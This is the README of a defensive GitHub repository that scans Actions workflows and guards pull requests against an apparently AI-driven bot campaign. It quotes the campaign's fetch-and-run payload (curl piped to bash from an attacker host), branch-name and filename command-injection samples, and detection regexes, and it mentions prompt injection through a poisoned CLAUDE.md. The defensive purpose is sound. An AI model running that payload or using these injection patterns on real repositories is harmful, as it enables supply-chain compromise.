
securityjoes/anti-hackerbot-claw


anti-hackerbot-claw

Defensive tooling against the hackerbot-claw campaign

GitHub · By JOES — donated to the community.

An AI-powered bot has been exploiting GitHub Actions workflows (StepSecurity investigation). You can’t reliably “take down” the bot; you harden your repo so its exploitation patterns fail. This repo gives you two ways to fight back:

  1. Workflow scanner — Find vulnerable workflow patterns (Pwn Request, comment-triggered without author check, expression injection, etc.) so you can fix them before the bot exploits them.
  2. PR guard — Run on every PR to block branch-name injection, filename injection, and known malicious payload URLs.

What hackerbot-claw does

  • Scans public repos for exploitable GitHub Actions (e.g. pull_request_target + checkout of fork code).
  • Uses 5+ techniques: Pwn Request, direct script injection, branch name injection, filename injection, AI prompt injection (poisoned CLAUDE.md).
  • Payload: curl -sSfL hackmoltrepeat.com/molt | bash (and variants).
  • Targets: Microsoft, DataDog, CNCF, and other high-profile repos.

Defense = automated guardrails: fix vulnerable workflows and block malicious PR content.

Install

git clone https://github.com/securityjoes/anti-hackerbot-claw.git
cd anti-hackerbot-claw
npm install

(Or fork the repo first and clone your fork.)

Quick start: node cli.js scan (scan current repo’s .github/workflows) or run node cli.js for the interactive menu.

Forkable and reusable: Donated by JOES (www.securityjoes.com). MIT-licensed — fork it, use it in your org, or copy the workflows into your repos; no signup or vendor lock-in. The scan workflow uses your GitHub org by default (repository_owner), so it works after a fork with no config change.

1. Scan workflows (local or CI)

Scan .github/workflows for the vulnerability patterns used in the campaign:

node cli.js scan
# or
npm run scan

Optional: scan a different directory, or output a report (JSON or HTML):

node cli.js scan path/to/workflows
node cli.js scan --format json                    # print JSON to stdout
node cli.js scan --format json --output /path/to/reports   # unique folder + zip
node cli.js scan --format html --output /path/to/reports   # required; unique folder + zip; password prompted
node cli.js scan --format html --output /path/to/reports --repo owner/repo --feedback-repo securityjoes/anti-hackerbot-claw

  • Report output: --output is a directory. The CLI creates a unique folder (e.g. report-20260302-143022) containing report.html and report.json, then prompts for a password and creates a password-protected zip of that folder (e.g. report-20260302-143022.zip). Leave the password empty to skip creating the zip. In CI (non-TTY), set REPORT_ZIP_PASSWORD to encrypt, or leave unset to get the folder only.
  • Exposure warning: If the output directory is inside a Git repository, the CLI warns that reports may be exposed if committed. Prefer a path outside the repo. .gitignore excludes report-*/ and *.zip.
  • JSON: With --output, creates the unique folder with report.json (and for HTML, also report.html). Without --output, JSON is printed to stdout.
  • HTML: Report includes How to fix, Copy PR description, New PR, New issue, and a Feedback section (stars + suggestions). Feedback defaults to this tool’s repo (securityjoes/anti-hackerbot-claw); override with --feedback-repo owner/repo. All fix links target the scanned repo (--repo or inferred from git).

Checks:

  • PWN_REQUEST — pull_request_target + checkout of fork ref/sha + execution of repo (fork) code.
  • BRANCH_NAME_INJECTION — Branch name (head ref) interpolated into shell without sanitization.
  • NO_AUTHOR_CHECK — Comment-triggered workflow with no author_association (or similar) check.
  • EXPRESSION_INJECTION — User-controlled or step output interpolated into shell (e.g. echo "${{ steps.x.outputs.y }}").
  • FORK_CHECKOUT — Checkout of PR head with pull_request_target.
  • WRITE_WITH_PRT — contents: write with pull_request_target.

Exit code: 1 if any finding; 0 if clean.
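
The following is an added example, not the project's scanner code: a line-based sketch of how four of the checks above (FORK_CHECKOUT, WRITE_WITH_PRT, BRANCH_NAME_INJECTION, EXPRESSION_INJECTION) can be detected. The regexes, the `scanWorkflow` name and the sample workflow are assumptions made for illustration.

```javascript
// Added example: line-based heuristics for four of the checks listed above.
// The regexes are assumptions; a production scanner should parse the YAML.
const EXPR = /\$\{\{\s*([^}]+?)\s*\}\}/g;

function scanWorkflow(yamlText) {
  const lines = yamlText.split('\n');
  const usesPrt = lines.some(l => /^\s*(on\s*:.*|-\s*)?pull_request_target\b/.test(l));
  const findings = [];
  let runCol = -1; // column of the active `run:` key, -1 when outside a run block
  lines.forEach((line, i) => {
    const indent = line.search(/\S/);
    if (indent === -1) return; // blank line
    const isRunKey = /^\s*(-\s*)?run\s*:/.test(line);
    if (isRunKey) runCol = line.indexOf('run');
    else if (indent <= runCol) runCol = -1; // dedent ends the run block
    const add = rule => findings.push({ rule, line: i + 1 });
    if (usesPrt && /contents\s*:\s*write/.test(line)) add('WRITE_WITH_PRT');
    if (usesPrt && /ref\s*:.*pull_request\.head\.(sha|ref)/.test(line)) add('FORK_CHECKOUT');
    if (runCol === -1) return; // only expressions that reach a shell are sinks here
    for (const [, expr] of line.matchAll(EXPR)) {
      if (/github\.head_ref|pull_request\.head\.ref/.test(expr)) add('BRANCH_NAME_INJECTION');
      else if (/^steps\.[\w-]+\.outputs\.|^github\.event\.[\w.]*(title|body)$/.test(expr)) add('EXPRESSION_INJECTION');
    }
  });
  return findings;
}

// Constructed sample workflow exhibiting the patterns.
const sampleWorkflow = [
  'on:',
  '  pull_request_target:',
  'permissions:',
  '  contents: write',
  'jobs:',
  '  triage:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - uses: actions/checkout@v4',
  '        with:',
  '          ref: ${{ github.event.pull_request.head.sha }}',
  '      - run: |',
  '          echo "branch ${{ github.head_ref }}"',
  '          echo "${{ steps.meta.outputs.title }}"',
  '      - run: echo "${{ github.event.pull_request.title }}"',
].join('\n');

console.log(scanWorkflow(sampleWorkflow));
```

Passing the same value through an `env:` entry and referencing it as a quoted shell variable produces no finding, because the expression no longer lands inside the `run:` text.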

Scan another repo: clone it and pass the workflows path, or add the scan workflow to that repo so CI runs the scanner on every push/PR (no secrets needed; uses same org by default).

Scanning many repos (e.g. large orgs): run the scanner per repo and merge reports. Example (bash): clone or list repo paths, then for each run node cli.js scan /path/to/repo/.github/workflows --format json --output reports/repo-name.json. Merge the findings arrays (or aggregate summary.bySeverity / summary.byRule) for a single view. You can also add the scan workflow to every repo so each runs in CI and you collect artifacts or use the JSON in a central dashboard.
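
An added example (not part of the project) of the merge step described above. It assumes each report is an object with a `findings` array whose items carry `rule` and `severity` fields; those field names, the severity values and the `mergeReports` name are assumptions. Summaries are recomputed from the findings, and a repo with no readable report is listed separately so it is not read as clean.

```javascript
// Added example: merges per-repo JSON reports into one org-wide view.
// Assumed report shape: { findings: [{ rule, severity, ... }] }.
function mergeReports(reportsByRepo) {
  const merged = {
    findings: [],
    summary: { bySeverity: {}, byRule: {}, byRepo: {} },
    unreadable: [],
  };
  for (const [repo, report] of Object.entries(reportsByRepo)) {
    if (!report || !Array.isArray(report.findings)) {
      merged.unreadable.push(repo); // a missing report must not count as "clean"
      continue;
    }
    merged.summary.byRepo[repo] = report.findings.length;
    for (const f of report.findings) {
      merged.findings.push({ repo, ...f });
      const sev = f.severity || 'unknown';
      const rule = f.rule || 'unknown';
      merged.summary.bySeverity[sev] = (merged.summary.bySeverity[sev] || 0) + 1;
      merged.summary.byRule[rule] = (merged.summary.byRule[rule] || 0) + 1;
    }
  }
  return merged;
}

// Constructed sample reports, keyed by hypothetical repo names.
const sampleReports = {
  'org/api': { findings: [
    { rule: 'PWN_REQUEST', severity: 'critical' },
    { rule: 'NO_AUTHOR_CHECK', severity: 'high' },
  ] },
  'org/web': { findings: [] },
  'org/docs': null, // scan failed or report file missing
  'org/cli': { findings: [{ rule: 'PWN_REQUEST', severity: 'critical' }] },
};

console.log(JSON.stringify(mergeReports(sampleReports).summary, null, 2));
```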

2. PR guard (branch name, filenames, diff)

Detects hackerbot-claw-style abuse in incoming PRs:

  • Branch name — Command substitution / ${IFS} / base64|bash in branch name.
  • Filenames — $(...) or base64 -d|bash in added/renamed file paths.
  • Diff — Known payload URLs/patterns (e.g. hackmoltrepeat.com, /molt, /moult).

Run locally (e.g. with env set):

export GITHUB_HEAD_REF="your-branch-name"
export CHANGED_FILES_JSON='["path/to/file1.md","path/to/file2.sh"]'
# optional: path to diff file
node cli.js guard /path/to/pr.diff

Or use the GitHub Action so every PR is checked automatically.
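
An added example, not the project's guard code, showing how the three checks above can be evaluated from the same inputs the CLI reads (`GITHUB_HEAD_REF`, `CHANGED_FILES_JSON` and a diff). The regexes, rule names and the `guardPullRequest` function are assumptions; the sample input is constructed.

```javascript
// Added example: regexes and rule names are assumptions modelled on the three
// guard checks listed above, not the project's own rule set.
const SHELL_INJECTION = [
  { rule: 'COMMAND_SUBSTITUTION', re: /\$\(|`/ },
  { rule: 'IFS_EVASION', re: /\$\{?IFS\}?/ },
  { rule: 'BASE64_PIPE_SHELL', re: /base64\b[^|]*\|\s*(ba)?sh\b/i },
];
const PAYLOAD_MARKERS = [
  { rule: 'KNOWN_PAYLOAD_HOST', re: /hackmoltrepeat\.com/i },
  { rule: 'KNOWN_PAYLOAD_PATH', re: /\/mou?lt\b/i }, // /molt and /moult
];

const match = (where, text, patterns) =>
  patterns.filter(p => p.re.test(text)).map(p => ({ where, rule: p.rule, text }));

function guardPullRequest(env, diffText = '') {
  const findings = match('branch', env.GITHUB_HEAD_REF || '', SHELL_INJECTION);
  let files = [];
  try {
    files = JSON.parse(env.CHANGED_FILES_JSON || '[]');
    if (!Array.isArray(files)) throw new TypeError('expected a JSON array');
  } catch (err) {
    // Fail closed: an unreadable file list is a finding, not a pass.
    files = [];
    findings.push({ where: 'filename', rule: 'UNPARSEABLE_FILE_LIST', text: String(err.message) });
  }
  for (const f of files) findings.push(...match('filename', String(f), SHELL_INJECTION));
  // Only added lines are scanned; '+++' file headers are covered by the filename check.
  const added = diffText.split('\n').filter(l => l.startsWith('+') && !l.startsWith('+++'));
  for (const line of added) findings.push(...match('diff', line, PAYLOAD_MARKERS));
  return findings;
}

// Constructed sample input (benign substitutions; payload line as quoted on this page).
const sampleEnv = {
  GITHUB_HEAD_REF: 'docs-update$(echo${IFS}test)',
  CHANGED_FILES_JSON: JSON.stringify(['docs/README.md', 'notes/$(echo${IFS}test).md']),
};
const sampleDiff = [
  '+++ b/scripts/setup.sh',
  '+echo "installing"',
  '+curl -sSfL hackmoltrepeat.com/molt | bash',
  '-curl https://example.com/molt',
].join('\n');

const sampleFindings = guardPullRequest(sampleEnv, sampleDiff);
console.log(sampleFindings.map(f => `${f.where}: ${f.rule}`).join('\n'));
```

The path marker is deliberately broad and will also flag a legitimate file or URL ending in `/molt`; treat a hit as a reason for review.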

Use the GitHub Action

Add a workflow that runs before any pull_request_target or comment-triggered workflow, and does not check out the PR’s code (so the guard itself can’t be poisoned):

# .github/workflows/pr-guard.yml
name: PR Guard
on:
  pull_request:
    types: [opened, synchronize]

jobs:
  guard:
    runs-on: ubuntu-latest
    steps:
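      # On pull_request events this checks out the PR merge commit: treat the tree as untrusted data and do not execute anything from it.
      - uses: actions/checkout@v4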
        with:
          fetch-depth: 0

      - name: Anti Hackerbot-Claw PR Guard
        uses: securityjoes/anti-hackerbot-claw@v1
        with:
          fail-on-finding: 'true'

For the guard to work as a reusable action, you’d typically use the published action securityjoes/anti-hackerbot-claw and reference it by tag. To run the guard in-repo without publishing, use a local composite step that runs the CLI (same guard logic) with GITHUB_HEAD_REF and the diff/changed files from the event.

Recommendation

  1. Scan your .github/workflows with node cli.js scan and fix any reported patterns (especially Pwn Request and comment-triggered without author check).
  2. Add the PR guard (Action or equivalent) so branch name injection, malicious filenames, and known payload URLs are blocked before other workflows run.
  3. Use minimal permissions on workflows (e.g. contents: read where write isn’t needed) and follow StepSecurity and Anthropic’s security guidance for AI-assisted workflows.

License

MIT — use, fork, and redistribute with minimal restrictions. See LICENSE in the repo root.

Tags & topics

  • GitHub topics (add in repo Settings → General → Topics): security, github-actions, supply-chain, ci-cd, hackerbot-claw, workflow-security, open-source.
  • Releases: Tag versions (e.g. v1.0.0) so users can pin uses: securityjoes/anti-hackerbot-claw@v1 in workflows. Create a release in GitHub with the same tag and attach the JSON report format or changelog if needed.

About

Anti-HackerBot-Claw is a scanner that checks for the workflow patterns hackerbot-claw looks for, so they can be fixed before exploitation.
